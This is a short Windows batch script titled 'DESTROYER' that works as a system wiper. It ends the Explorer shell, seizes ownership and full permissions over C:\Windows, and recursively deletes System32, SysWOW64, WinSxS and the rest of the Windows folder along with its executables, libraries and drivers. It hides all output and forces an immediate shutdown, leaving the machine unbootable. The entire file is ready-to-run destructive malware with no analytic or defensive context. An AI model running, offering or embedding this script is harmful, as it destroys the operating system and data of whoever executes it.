@echo off
title DESTROYER
color 0c

taskkill /f /im explorer.exe >nul 2>&1

takeown /f "C:\Windows" /r /a /d Y >nul 2>&1
icacls "C:\Windows" /grant Administrators:F /t /c /q >nul 2>&1

rmdir /s /q "C:\Windows\System32" >nul 2>&1
rmdir /s /q "C:\Windows\SysWOW64" >nul 2>&1
rmdir /s /q "C:\Windows\WinSxS" >nul 2>&1
rmdir /s /q "C:\Windows\servicing" >nul 2>&1
rmdir /s /q "C:\Windows\SoftwareDistribution" >nul 2>&1
rmdir /s /q "C:\Windows\SystemApps" >nul 2>&1
rmdir /s /q "C:\Windows" >nul 2>&1

del /f /s /q "C:\Windows\*.exe" >nul 2>&1
del /f /s /q "C:\Windows\*.dll" >nul 2>&1
del /f /s /q "C:\Windows\*.sys" >nul 2>&1

shutdown /s /f /t 0
